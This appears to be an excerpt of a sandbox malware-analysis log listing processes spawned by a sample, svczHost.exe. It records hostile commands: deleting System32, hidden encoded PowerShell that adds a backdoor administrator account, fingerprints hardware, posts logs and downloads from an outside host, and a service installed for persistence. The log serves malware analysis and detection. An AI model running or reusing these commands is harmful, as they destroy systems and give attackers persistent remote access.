AB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAG	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto & net start "myRdpService"
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc query myRdpService
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "myRdpService"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi7" start= auto
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net start "myRdpService"
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\regedit.exe "regedit.exe" /e "C:\Windows\Temp\regBackup.reg" "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService"
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "systeminfo \| Select-String \"OS Name\",\"OS Version\";"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\systeminfo.exe "C:\Windows\system32\systeminfo.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -EncodedCommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7ACAAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMALgBTAGMAcgBlAGUAbgBdADoAOgBBAGwAbABTAGMAcgBlAGUAbgBzACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAiACQAKAAkAF8ALgBCAG8AdQBuAGQAcwAuAFcAaQBkAHQAaAApAHgAJAAoACQAXwAuAEIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQAiACAAfQAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAtAEYAaQBsAGUAUABhAHQAaAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABkAHAAIgA=

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8amwa3aguamgbhaduanwa2adcaoaaxagyangawaguayqblageanqa1aguamwa3adkaygbladyayqbladaamaa3adcanga0adeaygazadkazga1adkamaa3adkamga0agqaoaa1adianaayadqamqbladiaoqbiadcayqa1admayqa2adeamwbiadmazaazadcazga5adaazqawadaanqbladeamqbiadkangbkadyamqaxadcangayadkamaa0adyaoqa5adaaywaxagqazga3adkayqbhadkanwazaduamga4adkamwawadgaywaxagiamgbmageaoqblagqazqblageanabkagmanqbmaguanqbhadaaoqbiagyaoqbiadianwa3admazqblageazga5adaaoqa1adaayga2adkangbmaguamqawagmaywa5agqaygazadcanaa1agianqaxaduamqbladqaygawadaamabhadcaoqaxadiamqazagmazga5admazgayaduamaa3adaazga1adgaoqbiadqamabmagqamwbladmaoqbjadqayqaxadgazqbkageazaayaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand jab1ahiaaqagad0aiaaiaggadab0ahaacwa6ac8alwbragkabgbnahmabqbhagsazqbyac4aywbhac8azgbpagwazqayac8amwa3aguamgbhaduanwa2adcaoaaxagyangawaguayqblageanqa1aguamwa3adkaygbladyayqbladaamaa3adcanga0adeaygazadkazga1adkamaa3adkamga0agqaoaa1adianaayadqamqbladiaoqbiadcayqa1admayqa2adeamwbiadmazaazadcazga5adaazqawadaanqbladeamqbiadkangbkadyamqaxadcangayadkamaa0adyaoqa5adaaywaxagqazga3adkayqbhadkanwazaduamga4adkamwawadgaywaxagiamgbmageaoqblagqazqblageanabkagmanqbmaguanqbhadaaoqbiagyaoqbiadianwa3admazqblageazga5adaaoqa1adaayga2adkangbmaguamqawagmaywa5agqaygazadcanaa1agianqaxaduamqbladqaygawadaamabhadcaoqaxadiamqazagmazga5admazgayaduamaa3adaazga1adgaoqbiadqamabmagqamwbladmaoqbjadqayqaxadgazqbkageazaayaciaowanaaoajabjag8adqbuahqaiaa9acaamqawadaaowanaaoadqakaa0acganaaoazgb1ag4aywb0agkabwbuacaauwblag4azaagahsadqakacaaiaagacaacabhahiayqbtacgaiabbafaauwbpagiaagblagmadabdacaajabsag8azwbnahmazwagackadqakaa0acgagacaaiaagacmaiabdag8abgb2aguacgb0acaaygbvagqaeqagahqabwagahmadabyagkabgbnaa0acgagacaaiaagacqacwb0ahiaaqbuagcaqgbvagqaeqagad0aiabbahmadabyagkabgbnaf0akaakagwabwbnae0acwbnacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abgapadsadqakacaaiaagacaajabsag8azwbnaguacwbzageazwblahmaiaa9acaaqaaoackaowanaaoaiaagacaaiaakagwabwbnae0azqbzahmayqbnaguacwagacsapqagacqacwb0ahiaaqbuagcaqgbvagqaeqa7aa0acgagacaaiaagacqababvagcatqblahmacwbhagcazqbzacaakwa9acaaigatac0alqatac0alqatac0alqataciaowanaaoadqakacaaiaagacaajaboaguayqbkaguacgbzacaapqagaeaaewb9adsadqakacaaiaagacaajabraguaeqagad0aiaaiaemabwbuahqazqbuahqalqbuahkacablaciaowanaaoaiaagacaaiaakahyayqbsahuazqagad0aiaaiageacabwagwaaqbjageadabpag8abgavagoacwbvag4aiga7aa0acganaaoaiaagacaaiaakaggazqbhagqazqbyahmawwakagsazqb5af0aiaa9acaajab2ageabab1aguaowanaaoaiaagacaaiaakahuacgbpacaapqagaciatabpaecavqbsaewaiga7aa0acgagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaewanaaoaiaagacaaiaagacaaiaagacaaiaagacaajabiag8azab5acaapqagacqababvagcatqblahmacwbhagcazqbzacaafaagaemabwbuahyazqbyahqavabvac0asgbzag8abga7aa0acgagacaaiaagacaaiaagacaaiaagacaaiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0atqblahqaaabvagqaiabqag8acwb0acaalqbiaguayqbkaguacgbzacaajaboaguayqbkaguacgbzacaalqbcag8azab5acaajabiag8azab5aa0acgagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagagmayqb0agmaaab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaanaaoaiaagacaaiaagacaaiaagah0adqakacaaiaagacaadqakah0adqakaa0acgb3aggaaqbsaguakaakagmabwb1ag4adaagac0azwb0acaamaapaa0acgb7aa0acgajaa0acgajahqacgb5ahsadqakacaaiaagacaaiaagacaaiabtaguabgbkacaaigbiaguazwbpag4aiabkag8adwbuagwabwbhagqaiaakahuacgbpaciaowanaaoacqajacqaywbvag4adablag4adaagad0aiabjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab1ahiaaqagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowanaaoaiaagacaaiaagacaaiaagacqaygb5ahqazqbbahiacgbhahkaiaa9acaajabjag8abgb0aguabgb0ac4aywbvag4adablag4adaa7aa0acgagacaaiaagacaaiaagacaazgbvahiaiaaoacqaaqagad0aiaawadsaiaakag
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand zgb1ag4aywb0agkabwbuacaarwblahqalqbjagqazqbuahqaaqb0ahkaewakacaaiaagacaajaboageacgbkaeqacgbpahyazqbzacaapqagaecazqb0ac0avwbtagkatwbiagoazqbjahqaiaataemababhahmacwagafcaaqbuadmamgbfaeqaaqbzagsarabyagkadgblacaafaagafcaaablahiazqatae8aygbqaguaywb0acaaewagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhaciaiaatag8acgagacqaxwauae0azqbkagkayqbuahkacablacaalqblaheaiaaiaeyaaqb4aguazaagaggayqbyagqaiabkagkacwbracaabqblagqaaqbhacaalqagafmauwbeaciaiab9aaoajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaa9acaaqaaoackacgbmag8acgblageaywboacaakaakaggayqbyagqarabyagkadgblacaaaqbuacaajaboageacgbkaeqacgbpahyazqbzackaiab7aaoaiaagacaaiaakahmazqbyagkayqbsae4adqbtagiazqbyacaapqagacqaaabhahiazabeahiaaqb2agualgbtaguacgbpageababoahuabqbiaguacgakacaaiaagacaajabtag8azablagwaiaa9acaajaboageacgbkaeqacgbpahyazqauae0abwbkaguabaakacaaiaagacaajabkahiaaqb2aguasqbuagyabwagad0aiaaiafmazqbyagkayqbsacaatgb1ag0aygblahiaogagacqacwblahiaaqbhagwatgb1ag0aygblahialaagae0abwbkaguabaa6acaajabtag8azablagwaigakacaaiaagacaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaarad0aiaakagqacgbpahyazqbjag4azgbvaaoafqakacqaywbvag0aygbpag4azqbkaekabgbmag8aiaa9acaajabkahiaaqb2aguasqbuagyabwbbahiacgbhahkaiaatagoabwbpag4aiaaiagaacgbgag4aigakacqaywbwahuasqbuagyabwagad0aiabhaguadaatafcabqbpae8aygbqaguaywb0acaalqbdagwayqbzahmaiabxagkabgazadiaxwbqahiabwbjaguacwbzag8acgakacqaywbwahuarablahqayqbpagwacwagad0aiaaiafaacgbvagmazqbzahmabwbyaekazaa6acaajaaoacqaywbwahuasqbuagyabwauafaacgbvagmazqbzahmabwbyaekazaapacwaiaboageabqbladoaiaakacgajabjahaadqbjag4azgbvac4atgbhag0azqapacwaiabnageaeabdagwabwbjagsauwbwaguazqbkadoaiaakacgajabjahaadqbjag4azgbvac4atqbhahgaqwbsag8aywbrafmacablaguazaapacwaiabvag4aaqbxahuazqbjagqaogagacqakaakagmacab1aekabgbmag8algbvag4aaqbxahuazqbjagqakqaiaaoajabhagwababjag4azgbvacaapqagaciajabjag8abqbiagkabgblagqasqbuagyabwbgahiayabuacqaywbwahuarablahqayqbpagwacwaiaaoajabtagqanqagad0aiaboaguadwatae8aygbqaguaywb0acaauwb5ahmadablag0algbtaguaywb1ahiaaqb0ahkalgbdahiaeqbwahqabwbnahiayqbwaggaeqauae0araa1aemacgb5ahaadabvafmazqbyahyaaqbjaguauabyag8adgbpagqazqbyaaoajabiahkadablahmaiaa9acaawwbtahkacwb0aguabqauafqazqb4ahqalgbfag4aywbvagqaaqbuagcaxqa6adoavqbuaeyaoaauaecazqb0aeiaeqb0aguacwaoacqayqbsagwasqbuagyabwapaaoajaboageacwboaeiaeqb0aguacwagad0aiaakag0azaa1ac4aqwbvag0acab1ahqazqbiageacwboacgajabiahkadablahmakqakacqaaabhahmaaaagad0aiabbaeiaaqb0aemabwbuahyazqbyahqazqbyaf0aoga6afqabwbtahqacgbpag4azwaoacqaaabhahmaaabcahkadablahmakqagac0acgblahaababhagmazqagaccalqanaaoaiaagacaaiabyaguadab1ahiabgagacqaaabhahmaaaa7aaoafqakagmazaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaiga7aaoajab0aguacwb0acaapqagaecazqb0ac0asqbkaguabgb0agkadab5adsacgakahqazqbzahqaiab8acaatwb1ahqalqbgagkabablacaalqbgagkabablafaayqb0aggaiaaiagqazqb2agkaywblaekazaauahqaeab0aciaiaataeuabgbjag8azabpag4azwagafuavabgadga
Source: C:\Windows\Temp\svczHost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -nologo -noprofile -windowstyle hidden -executionpolicy bypass -encodedcommand jabvahmazqbyag4ayqbtaguaiaa9acaaigbvahmazqbyadeaiga7acqacab3agqaiaa9acaaigaxadiamwa0aduanga3adgaoqahaeeamqbhaciaowagacqavqbzaguacgbqageacgbhag0acwagad0aiabaahsajwboageabqblaccaiaa9acaajabvahmazqbyag4ayqbtaguaowagaccauabhahmacwb3ag8acgbkaccaiaa9acaakabdag8abgb2aguacgb0afqabwatafmazqbjahuacgblafmadabyagkabgbnacaalqbtahqacgbpag4azwagacqacab3agqaiaataeeacwbqagwayqbpag4avablahgadaagac0argbvahiaywblackaowagaccauabhahmacwb3ag8acgbkae4azqb2aguacgbfahgacabpahiazqbzaccaiaa9acaajab0ahiadqblah0aowboaguadwataewabwbjageababvahmazqbyacaaqabvahmazqbyafaayqbyageabqbzadsajabhahiabwb1ahaauabhahiayqbtahmaiaa9acaaqab7accarwbyag8adqbwaccaiaa9acaajwbbagqabqbpag4aaqbzahqacgbhahqabwbyahmajwa7acaajwbnaguabqbiaguacganacaapqagacqavqbzaguacgbuageabqblah0aowbbagqazaataewabwbjageababhahiabwb1ahaatqblag0aygblahiaiabaaecacgbvahuacabqageacgbhag0acwa7aa0acga=
Source: C:\Windows\Temp\myRdpService.exe	Process created: C:\Windows\System32\cmd.exe /c powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -w hidden -nologo -nop -ep bypass -encodedcommand qqbkagqalqbuahkacablacaalqbbahmacwblag0aygbsahkatgbhag0azqagafmaeqbzahqazqbtac4avwbpag4azabvahcacwauaeyabwbyag0acwa7acaawwbtahkacwb0aguabqauafcaaqbuagqabwb3ahmalgbgag8acgbtahmalgbtagmacgblaguabgbdadoaogbbagwababtagmacgblaguabgbzacaafaagaeyabwbyaeuayqbjaggalqbpagiaagblagmadaagahsaiaaiacqakaakaf8algbcag8adqbuagqacwauafcaaqbkahqaaaapahgajaaoacqaxwauaeiabwb1ag4azabzac4asablagkazwboahqakqaiacaafqagahwaiabpahuadaataeyaaqbsaguaiaataeyaaqbsaguauabhahqaaaagaciaqwa6afwavwbpag4azabvahcacwbcafqazqbtahaaxabkahaaiga=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c start /min "" powershell.exe -windowstyle hidden -nologo -noprofile -executionpolicy bypass -encodedcommand 